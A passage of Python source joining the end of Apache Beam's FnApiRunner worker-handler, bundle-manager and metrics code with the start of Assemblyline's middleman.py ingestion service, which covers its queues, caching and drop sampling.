append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.blocking_clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
class WorkerHandler(object):
_registered_environments = {}
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory controller for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(self.state),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}))
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
logging.debug('CONTROL REQUEST %s', request)
response = self.worker.do_instruction(request)
logging.debug('CONTROL RESPONSE %s', response)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
pass
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based controller for fn API control, state and data planes."""
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info):
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
m = beam_artifact_api_pb2_grpc
m.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir),
self.control_server)
self.data_plane_handler = data_plane.GrpcServerDataChannel()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=2),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
logging.info('starting state server on port %s', self.state_port)
logging.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self.data_port)
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self.state_port)
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self.logging_port)
def close(self):
self.control_handler.done()
self.data_plane_handler.close()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
super(GrpcWorkerHandler, self).close()
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info):
super(ExternalWorkerHandler, self).__init__(state, provision_info)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.NotifyRunnerAvailable(
beam_fn_api_pb2.NotifyRunnerAvailableRequest(
worker_id='worker_%s' % uuid.uuid4(),
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, num_workers_payload, state, provision_info):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info)
self._num_threads = int(num_workers_payload) if num_workers_payload else 1
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, worker_count=self._num_threads)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info)
self._container_image = payload.container_image
self._container_id = None
def start_worker(self):
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
logging.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % uuid.uuid4(),
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
logging.info('Waiting for docker to start up...')
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
if status == 'running':
break
elif status in ('dead', 'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start.')
time.sleep(1)
def stop_worker(self):
if self._container_id:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info=None):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = {}
self._state = FnApiRunner.StateServicer() # rename?
def get_worker_handler(self, environment_id):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
worker_handler = self._cached_handlers.get(environment_id)
if worker_handler is None:
worker_handler = self._cached_handlers[
environment_id] = WorkerHandler.create(
environment, self._state, self._job_provision_info)
worker_handler.start_worker()
return worker_handler
def close_all(self):
for controller in set(self._cached_handlers.values()):
try:
controller.close()
except Exception:
logging.info("Error closing controller %s" % controller, exc_info=True)
self._cached_handlers = {}
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
class BundleManager(object):
_uid_counter = 0
def __init__(
self, controller, get_buffer, get_input_coder_impl, bundle_descriptor,
progress_frequency=None, skip_registration=False):
self._controller = controller
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
# Register the bundle descriptor, if needed.
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._controller.control_handler.push(
process_bundle_registration)
self._registered = True
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
if not split_manager:
# Write all the input data to the channel immediately.
for (transform_id, name), elements in inputs.items():
data_out = self._controller.data_plane_handler.output_stream(
process_bundle_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
for element_data in elements:
data_out.write(element_data)
data_out.close()
split_results = []
# Actually start the bundle.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=self._bundle_descriptor.id))
result_future = self._controller.control_handler.push(process_bundle)
with ProgressRequester(
self._controller, process_bundle_id, self._progress_frequency):
if split_manager:
(read_transform_id, name), buffer_data = only_element(inputs.items())
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(
b''.join(buffer_data))))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
data_out = self._controller.data_plane_handler.output_stream(
process_bundle_id,
beam_fn_api_pb2.Target(
primitive_transform_reference=read_transform_id, name=name))
data_out.write(b''.join(buffer_data))
data_out.close()
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_reference=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._controller.control_handler.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._controller.control_handler.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
# Gather all output data.
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in expected_outputs.items()]
logging.debug('Gather all output data from %s.', expected_targets)
for output in self._controller.data_plane_handler.input_elements(
process_bundle_id,
expected_targets,
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple in expected_outputs:
self._get_buffer(expected_outputs[target_tuple]).append(output.data)
logging.debug('Wait for the bundle to finish.')
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
return result, split_results
class ProgressRequester(threading.Thread):
def __init__(self, controller, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._controller = controller
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._controller.control_handler.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_reference=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metrics.metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
use_monitoring_infos: If true, return the metrics based on the
step_monitoring_infos.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._init_metrics_from_monitoring_infos(step_monitoring_infos)
self._monitoring_infos = step_monitoring_infos
def _init_metrics_from_monitoring_infos(self, step_monitoring_infos):
for smi in step_monitoring_infos.values():
# Only include user metrics.
for mi in smi:
if (self._user_metrics_only and
not monitoring_infos.is_user_monitoring_info(mi)):
continue
key = self._to_metric_key(mi)
if monitoring_infos.is_counter(mi):
self._counters[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_distribution(mi):
self._distributions[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_gauge(mi):
self._gauges[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
def _to_metric_key(self, monitoring_info):
# Right now this assumes that all metrics have a PTRANSFORM
ptransform_id = monitoring_info.labels['PTRANSFORM']
namespace, name = monitoring_infos.parse_namespace_and_name(monitoring_info)
return MetricKey(ptransform_id, MetricName(namespace, name))
def query(self, filter=None):
counters = [metrics.execution.MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [metrics.execution.MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [metrics.execution.MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable oject including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
|
middleman.py
|
#!/usr/bin/env python
"""
Middleman
Middleman is responsible for monitoring for incoming submission requests,
sending submissions, waiting for submissions to complete, sending a message
to a notification queue as specified by the submission and, based on the
score received, possibly sending a message to indicate that an alert should
be created.
"""
# This file has comments prefixed with a 'df' which are used to extract a
# dataflow diagram. These comments take one of the six forms shown below:
#
# rule <name> <regex> => <replacement> [#]
# text <literal text> [#]
# line <name> [#]
# node <name> [#]
# pull <name> [#]
# push <name> [#]
#
# Rule lines cause the replacement to be stored with a given name.
# Text lines insert the text verbatim. Line lines apply the rule with
# the given name to the current line. Head and pull/push lines are
# similar except that the text extracted from a node line is retained
# and matched with all following pull/push lines until the next node
# line. All dataflow directives are terminated by a newline but they
# can also be terminated by a hash character so that they can share a
# line with pylint, or other, directives.
#
# To produce a dataflow diagram find the dataflow script (most likely
# under al/run/admin) and (with Graphviz installed) run:
#
# dataflow.py < middleman.py | dot -Tsvg > dataflow.svg
#
# df rule add ^\W*(\w+)\.add.* => \1
# df rule calls ^\W*(?:if )?(\w+).* => \1
# df rule def ^def (\w+).* => \1
# df rule delete ^\W*(\w+)\.delete.* => \1
# df rule hash ^(\w+) = .* => \1 [label=\1,shape=polygon,sides=4,skew=.4]
# df rule ifcalls ^\W*if (\w+).* => \1
# df rule pop ^.* (\w+)\.pop.* => \1
# df rule push ^\W*(\w+)\.push.* => \1
# df rule queue ^(\w+) = .* => \1 [label=\1,shape=plaintext]
# df rule thread ^.*range.(\w+).*target=(\w+).* => \2 [label="\2 x\1"]
#
# df text digraph dataflow {
# df text node [shape=box]
# df text rankdir=TB
# df text ranksep="1"
# df text { rank=source; "ingestq"; "completeq"; }
# df text { rank=sink; "alertq"; "trafficq"; }
import getopt
import logging
import redis
import signal
import sys
import time
import riak
from collections import namedtuple
from math import tanh
from random import random
from assemblyline.common import net
from threading import RLock, Thread
from assemblyline.common.charset import dotdump, safe_str
from assemblyline.common.exceptions import get_stacktrace_info
from assemblyline.common.isotime import iso_to_epoch, now, now_as_iso
from assemblyline.common.net import get_hostip, get_hostname, get_mac_address
from assemblyline.al.common import forge
from assemblyline.al.common import counter
from assemblyline.al.common import log
from assemblyline.al.common import message
from assemblyline.al.common import queue
from assemblyline.al.common.notice import Notice, overrides
from assemblyline.al.common.remote_datatypes import Hash
from assemblyline.al.common.task import Task, get_submission_overrides
from assemblyline.al.core.datastore import create_filescore_key
from assemblyline.al.core.filestore import FileStoreException, CorruptedFileStoreException
class ScanLock(object):
SCAN_LOCK_LOCK = RLock()
SCAN_LOCK = {}
def __init__(self, scan_key):
self.scan_key = scan_key
def __enter__(self):
with self.SCAN_LOCK_LOCK:
l = self.SCAN_LOCK.get(self.scan_key, None)
if not l:
self.SCAN_LOCK[self.scan_key] = l = [0, RLock()]
l[0] += 1
l[1].acquire()
def __exit__(self, unused1, unused2, unused3):
with self.SCAN_LOCK_LOCK:
l = self.SCAN_LOCK[self.scan_key]
l[0] -= 1
if l[0] == 0:
del self.SCAN_LOCK[self.scan_key]
l[1].release()
Timeout = namedtuple('Timeout', ['time', 'scan_key'])
Classification = forge.get_classification()
config = forge.get_config()
constants = forge.get_constants()
log.init_logging("middleman")
logger = logging.getLogger('assemblyline.middleman')
persistent = {
'db': config.core.redis.persistent.db,
'host': config.core.redis.persistent.host,
'port': config.core.redis.persistent.port,
}
shards = 1
try:
shards = int(config.core.middleman.shards)
except AttributeError:
logger.warning("No shards setting. Defaulting to %d.", shards)
shard = '0'
opts, _ = getopt.getopt(sys.argv[1:], 's:', ['shard='])
for opt, arg in opts:
if opt in ('-s', '--shard'):
shard = arg
# Globals
alertq = queue.NamedQueue('m-alert', **persistent) # df line queue
cache = {}
cache_lock = RLock()
chunk_size = 1000
completeq_name = 'm-complete-' + shard
date_fmt = '%Y-%m-%dT%H:%M:%SZ'
default_prefix = config.core.middleman.default_prefix
dup_prefix = 'w-' + shard + '-'
dupq = queue.MultiQueue(**persistent) # df line queue
expire_after_seconds = config.core.middleman.expire_after
get_whitelist_verdict = forge.get_get_whitelist_verdict()
hostinfo = {
'ip:': get_hostip(),
'mac_address': get_mac_address(),
'host': get_hostname(),
}
ingestq_name = 'm-ingest-' + shard
is_low_priority = forge.get_is_low_priority()
max_priority = config.submissions.max.priority
max_retries = 10
max_time = 2 * 24 * 60 * 60 # Wait 2 days for responses.
max_waiting = int(config.core.dispatcher.max.inflight) / (2 * shards)
min_priority = 1
priority_value = constants.PRIORITIES
retry_delay = 180
retryq = queue.NamedQueue('m-retry-' + shard, **persistent) # df line queue
running = True
sampling = False
selected_initial = [
'Antivirus', 'Extraction', 'Filtering', 'Networking', 'Static Analysis'
]
stale_after_seconds = config.core.middleman.stale_after
start_time = now()
submissionq = queue.NamedQueue('m-submission-' + shard, **persistent) # df line queue
timeouts = []
timeouts_lock = RLock()
whitelist = forge.get_whitelist()
whitelisted = {}
whitelisted_lock = RLock()
dropper_threads = 1
try:
dropper_threads = int(config.core.middleman.dropper_threads)
except AttributeError:
logger.warning(
"No dropper_threads setting. Defaulting to %d.",
dropper_threads
)
incomplete_expire_after_seconds = 3600
try:
incomplete_expire_after_seconds = \
config.core.middleman.incomplete_expire_after
except AttributeError:
logger.warning(
"No incomplete_stale_after setting. Defaulting to %d.",
incomplete_expire_after_seconds
)
incomplete_stale_after_seconds = 1800
try:
incomplete_stale_after_seconds = \
config.core.middleman.incomplete_stale_after
except AttributeError:
logger.warning(
"No incomplete_stale_after setting. Defaulting to %d.",
incomplete_stale_after_seconds
)
ingester_threads = 1
try:
ingester_threads = int(config.core.middleman.ingester_threads)
except AttributeError:
logger.warning(
"No ingester_threads setting. Defaulting to %d.",
ingester_threads
)
submitter_threads = 1
try:
submitter_threads = int(config.core.middleman.submitter_threads)
except AttributeError:
logger.warning(
"No submitter_threads setting. Defaulting to %d.",
submitter_threads
)
defaults = {
'classification': config.core.middleman.classification,
'completed_queue': completeq_name,
'deep_scan': False,
'ignore_cache': False,
'ignore_filtering': False,
'ignore_tag': False,
'max_extracted': config.core.middleman.max_extracted,
'max_supplementary': config.core.middleman.max_supplementary,
'params': {},
}
# When a unique queue for a priority group has passed a threshold value, we
# start sampling, gradually increasing the probability that a newly ingested
# entry will be dropped.
sample_threshold = {
'low': config.core.middleman.get('sampling_at', {}).get('low', 10000000),
'medium': config.core.middleman.get('sampling_at', {}).get('medium', 2000000),
'high': config.core.middleman.get('sampling_at', {}).get('high', 1000000),
'critical': config.core.middleman.get('sampling_at', {}).get('critical', 500000),
}
priority_range = {}
prev = 'low'
start = 0
for lvl in ('medium', 'high', 'critical', 'user'):
end = priority_value.get(lvl, max_priority + 1)
priority_range[prev] = (start, end - 1)
prev = lvl
start = end
threshold_value = {
'critical': 500,
'high': 100,
}
# Input. An external process creates a record when any submission completes.
completeq = queue.NamedQueue(completeq_name) # df line queue
# Output. Dropped entries are placed on this queue.
dropq = queue.NamedQueue('m-drop-' + shard, **persistent) # df line queue
# Input. An external process places submission requests on this queue.
ingestq = queue.NamedQueue(ingestq_name, **persistent) # df line queue
# Output. Notifications are placed on a notification queue.
notificationq = {}
# Input/Output. Unique requests are placed in and processed from this queue.
uniqueq = queue.PriorityQueue('m-unique-' + shard, **persistent) # df line queue
# State. The submissions in progress are stored in Redis in order to
# persist this state and recover in case we crash.
scanning = Hash('m-scanning-' + shard, **persistent) # df line hash
# Status.
statusq = queue.CommsQueue('status')
# Traffic.
# df text trafficq [label=trafficq,shape=plaintext]
trafficq = queue.LocalQueue()
def exit_and_log(original):
# noinspection PyBroadException
def wrapper(*args, **kwargs):
global running # pylint: disable=W0603
try:
return original(*args, **kwargs)
except: # pylint: disable=W0702
logger.exception("Exiting:")
running = False
wrapper.__name__ = original.__name__
wrapper.__doc__ = original.__doc__
wrapper.__dict__.update(original.__dict__)
return wrapper
def _add(key, psid, sid, score, errors, t):
cache[key] = {
'errors': errors,
'psid': psid,
'score': score,
'sid': sid,
'time': t,
}
def add(key, psid, sid, score, errors, t):
with cache_lock:
_add(key, psid, sid, score, errors, t)
def check(datastore, notice):
key = stamp_filescore_key(notice)
with cache_lock:
result = cache.get(key, None)
counter_name = 'ingest.cache_hit_local'
if result:
logger.info('Local cache hit')
else:
counter_name = 'ingest.cache_hit'
result = datastore.get_filescore(key)
if result:
logger.info('Remote cache hit')
else:
ingester_counts.increment('ingest.cache_miss')
return None, False, None, key
add(key, result.get('psid', None), result['sid'], result['score'],
result.get('errors', 0), result['time'])
current_time = now()
delta = current_time - result.get('time', current_time)
errors = result.get('errors', 0)
if expired(delta, errors):
ingester_counts.increment('ingest.cache_expired')
with cache_lock:
cache.pop(key, None)
datastore.delete_filescore(key)
return None, False, None, key
elif stale(delta, errors):
ingester_counts.increment('ingest.cache_stale')
return None, False, result['score'], key
ingester_counts.increment(counter_name)
return result.get('psid', None), result['sid'], result['score'], key
# Invoked when notified that a submission has completed.
# noinspection PyBroadException
def completed(task): # df node def
sha256 = task.root_sha256
psid = task.psid
score = task.score
sid = task.sid
scan_key = task.scan_key
with ScanLock(scan_key):
# Remove the entry from the hash of submissions in progress.
raw = scanning.pop(scan_key) # df pull pop
if not raw:
logger.warning("Untracked submission (score=%d) for: %s %s",
int(score), sha256, str(task.metadata))
# Not a result we care about. We are notified for every
# submission that completes. Some submissions will not be ours.
if task.metadata:
stype = None
try:
stype = task.metadata.get('type', None)
except: # pylint: disable=W0702
logger.exception("Malformed metadata: %s:", sid)
if not stype:
return scan_key
if (task.description or '').startswith(default_prefix):
raw = {
'metadata': task.metadata,
'overrides': get_submission_overrides(task, overrides),
'sha256': sha256,
'type': stype,
}
finalize(psid, sid, score, Notice(raw))
return scan_key
errors = task.raw.get('error_count', 0)
file_count = task.raw.get('file_count', 0)
ingester_counts.increment('ingest.submissions_completed')
ingester_counts.increment('ingest.files_completed', file_count)
ingester_counts.increment('ingest.bytes_completed', int(task.size or 0))
notice = Notice(raw)
with cache_lock:
_add(scan_key, psid, sid, score, errors, now())
finalize(psid, sid, score, notice) # df push calls
def exhaust():
while True:
res = dupq.pop( # df pull pop
dup_prefix + scan_key, blocking=False
)
if res is None:
break
yield res
# You may be tempted to remove the assignment to dups and use the
# value directly in the for loop below. That would be a mistake.
# The function finalize may push on the duplicate queue which we
# are pulling off and so condensing those two lines creates a
# potential infinite loop.
dups = [dup for dup in exhaust()]
for dup in dups:
finalize(psid, sid, score, Notice(dup))
return scan_key
def stamp_filescore_key(notice, sha256=None):
if not sha256:
sha256 = notice.get('sha256')
key_data = notice.parse(
description=': '.join((default_prefix, sha256 or '')), **defaults
)
selected = notice.get('selected')
key = notice.get('scan_key', None)
if not key:
key = create_filescore_key(sha256, key_data, selected)
notice.set('scan_key', key)
return key
def determine_resubmit_selected(selected, resubmit_to):
resubmit_selected = None
selected = set(selected)
resubmit_to = set(resubmit_to)
if not selected.issuperset(resubmit_to):
resubmit_selected = sorted(selected.union(resubmit_to))
return resubmit_selected
def drop(notice): # df node def
priority = notice.get('priority')
dropped = False
if priority <= min_priority:
dropped = True
else:
for level in ('low', 'medium', 'critical', 'high'):
rng = priority_range[level]
if rng[0] <= priority <= rng[1]:
dropped = must_drop(uniqueq.count(*rng),
sample_threshold[level])
break
if notice.get('never_drop', False) or not dropped:
return False
notice.set('failure', 'Skipped')
dropq.push(notice.raw) # df push push
ingester_counts.increment('ingest.skipped')
return True
def drop_chance(length, maximum):
return tanh(float(length - maximum) / maximum * 2.0)
@exit_and_log
def dropper(): # df node def
datastore = forge.get_datastore()
while running:
raw = dropq.pop(timeout=1) # df pull pop
if not raw:
continue
notice = Notice(raw)
send_notification(notice)
